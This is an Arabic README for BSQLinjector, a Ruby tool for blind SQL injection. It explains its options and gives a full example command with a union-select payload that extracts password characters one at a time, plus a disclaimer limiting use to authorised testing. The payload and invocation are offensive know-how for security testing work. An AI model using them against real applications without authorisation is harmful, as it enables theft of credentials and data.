
أداة استغلال حقن SQL الأعمى مكتوبة بلغة روبي.
يستخدم BSQLinjector الطريقة العمياء لاسترجاع البيانات من قواعد بيانات SQL. أوصي باستخدام المفتاح "--test" لرؤية كيف يبدو الحمولة المُعدّلة قبل إرسالها إلى التطبيق.
--file إلزامي - ملف يحتوي على طلب HTTP صالح ونقطة حقن SQL (SQLINJECT). (--file=/tmp/req.txt)
--pattern إلزامي - النمط الذي سيتم البحث عنه عندما يكون الاستعلام صحيحًا. (--pattern=truestatement)
--prepend إلزامي - الحمولة الرئيسية. (--prepend="abcd'and'a'='b'+union+select+'truestatement'+from+table+where+col%3d'value'+and+substr(password,"
--append كيفية إنهاء الحمولة. مثلاً تعليق باقي جملة SQL. (--append='#)
--schar حرف يوضع حول الأحرف. لا يُستخدم هذا الحرف في الوضع السداسي. (--schar="'")
--2ndfile ملف يحتوي على طلب HTTP صالح يُستخدم في استغلال من الدرجة الثانية. (--2ndfile=/tmp/2ndreq.txt)
--mode وضع الاستعلام الأعمى المستخدم - (between - b (يولد عدد أقل من الطلبات), moreless - a (يولد عدد أقل من الطلبات باستخدام الأحرف "<", ">", "="), like - l (هجوم شامل), equals - e (هجوم شامل)). (--mode=l)
--postgres استخدم "for" من PostgreSQL في دالة substring (مثال: from 1 for 1).
--hex استخدم النظام السداسي للمقارنة بدلاً من الأحرف.
--case حساسية حالة الأحرف.
--ssl استخدم SSL.
--proxy الوكيل المستخدم. (--proxy=127.0.0.1:8080)
--test تفعيل وضع الاختبار. لا يتم إرسال الطلب، فقط عرض الحمولة كاملة.
--special تضمين جميع الأحرف الخاصة في التعداد.
--start بدء التعداد من حرف محدد. (--start=10)
--max أقصى عدد من الأحرف للتعداد. (--max=10)
--timeout مهلة انتظار الردود. (--timeout=20)
--only-final إيقاف عرض كل حرف تم تعداده.
--comma تشفير الفاصلة.
--bracket إضافة أقواس إلى نهاية دالة substring. --bracket="))"
--hexspace استخدام مسافة بدلاً من الأقواس لفصل القيم السداسية.
--verbose عرض رسائل تفصيلية.
ruby ./BSQLinjector.rb --pattern=truestatement --file=/tmp/req.txt --schar="'" --prepend="abcd'and'a'='b'+union+select+'truestatement'+from+table+where+col%3d'value'+and+substr(password," --append="'#" --ssl
إخلاء مسؤولية
يحتوي هذا المستودع على أداة تم تطويرها لأغراض تعليمية بحتة. أي استخدام خاطئ للأداة في أنشطة غير قانونية محظور تمامًا.
إشعار قانوني
من المهم فهم جميع القوانين واللوائح المحلية المتعلقة بالأمن السيبراني والاختراق الأخلاقي والامتثال لها. الوصول غير المصرح به إلى أنظمة الكمبيوتر أو الشبكات أو البيانات غير قانوني ويعاقب عليه القانون. مطور هذا المستودع غير مسؤول عن أي استخدام خاطئ للأدوات الواردة فيه.
باستخدام الأدوات في هذا المستودع، فإنك توافق على استخدامها بمسؤولية وأخلاقية. احصل دائمًا على إذن صريح قبل اختبار أو محاولة الوصول إلى أي شبكة أو نظام أو بيانات لا تخصك.